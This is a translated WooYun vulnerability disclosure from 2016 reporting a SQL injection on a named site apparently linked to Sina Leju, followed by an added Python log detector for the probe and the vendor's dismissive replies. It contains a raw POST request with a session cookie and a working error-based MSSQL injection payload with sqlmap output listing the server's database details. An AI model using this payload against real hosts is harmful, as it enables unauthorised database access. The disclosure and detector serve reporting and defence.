
A Sina Leju system has a SQL injection vulnerability

ID: 219921
URL: http://www.wooyun.org/bug.php?action=view&id=219921
Status: the vendor was notified of the vulnerability but ignored it
Title: A Sina Leju system has a SQL injection vulnerability
Type: SQL injection
Vendor: leju.com
White hat: 路人甲
Submitted: 2016-06-16 17:16:00
Published: 2016-06-21 17:30:00
Fixed: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm Spend: -1
Tags:
Followers: 0
Bookmarks: 0
White hat rating:
White hat self-assessed rank: 20
Vendor rating:
Vendor-assessed rank: 0

Summary

http://shleju.w114.mc-test.com/

Details

Parameter: xName

POST /xiangmulistview.aspx HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Referer: http://shleju.w114.mc-test.com:80/
Cookie: ASP.NET_SessionId=rslqpvnnhedmgmilulgj3d0z
Host: shleju.w114.mc-test.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
xName=1*

PoC

sqlmap identified the following injection point(s) with a total of 208 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
current user: 'sq_yusuan'
current database: 'sq_yusuan'
current user is DBA: False
available databases [197]:
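As an added example (not part of the report or of the affected application), the following Python detector decodes form-encoded POST bodies and flags the error-based MSSQL probe pattern shown in the sqlmap payload above, run over constructed log lines. The log line format, the signature set and the two-signature threshold are assumptions.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures of the error-based MSSQL probe in the report (sqlmap "AND error-based -
# WHERE or HAVING clause"): CONVERT(INT, ...) to force a conversion error, CHAR()+CHAR()
# string building, a tautological CASE WHEN, a quoted AND comparison, and a "--" tail.
SIGNATURES = {
    "convert_int_error": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "char_concat": re.compile(r"CHAR\s*\(\s*\d+\s*\)\s*\+\s*CHAR\s*\(", re.I),
    "case_tautology": re.compile(r"CASE\s+WHEN\s*\(?\s*(\d+)\s*=\s*\1\b", re.I),
    "quote_and_compare": re.compile(r"'\s*AND\s+\d+\s*=", re.I),
    "comment_terminator": re.compile(r"(--|/\*)\s*\S*\s*$"),
}
THRESHOLD = 2  # a lone apostrophe or "--" is normal in project names; need two hits

def scan_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body and return
    {param: [signature names]} for parameters that trip >= THRESHOLD signatures."""
    hits = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [name for name, rx in SIGNATURES.items() if rx.search(value)]
            if len(matched) >= THRESHOLD:
                hits.setdefault(param, []).extend(matched)
    return hits

def scan_log(lines):
    """Apply scan_form_body to constructed log lines '<ts> <method> <path> <body>'
    (an assumed format, not IIS's own) and return the flagged (ts, path, hits) tuples."""
    flagged = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) == 4 and parts[1] == "POST":
            hits = scan_form_body(parts[3])
            if hits:
                flagged.append((parts[0], parts[2], hits))
    return flagged

# Constructed sample traffic: the report's payload form-encoded as it travels on the
# wire, two benign values that contain an apostrophe or "--", and a non-POST line.
REPORT_PAYLOAD = ("1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)"
                  "+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))"
                  "+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI")
SAMPLE_LOG = [
    "2016-06-16T17:16:00 POST /xiangmulistview.aspx " + urlencode({"xName": REPORT_PAYLOAD}),
    "2016-06-16T17:16:05 POST /xiangmulistview.aspx " + urlencode({"xName": "O'Neil Plaza"}),
    "2016-06-16T17:16:09 POST /xiangmulistview.aspx " + urlencode({"xName": "Block 3 -- phase 2"}),
    "2016-06-16T17:16:12 GET /xiangmulistview.aspx -",
]
```

Calling `scan_log(SAMPLE_LOG)` flags only the first line, with all five signatures matched on `xName`; the benign apostrophe and `--` values stay below the threshold.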

Fix proposal

Status history:
2016-06-16: details sent to the vendor, awaiting vendor handling
2016-06-16: vendor has viewed the vulnerability; details visible only to the vendor
2016-06-21: vendor actively ignored the vulnerability; details made public
Vendor reply: None
Vulnerability rank: 15 (WooYun assessment)
Response: severity: no impact; vendor ignored; ignored at 2016-06-21 17:30
Comments (content | commenter | likes | time):

@新浪乐居 The page shows it is Sina Leju's, I don't get it.
暴走 | 0 | 2016-06-17 09:39:00

Hello, this domain is not Leju's, thanks for your attention.
新浪乐居 | 0 | 2016-06-17 09:19:00

ddd
answer | 0 | 2016-06-16 21:32:00

Waiting for it to be ignored.
nony | 0 | 2016-06-16 18:57:00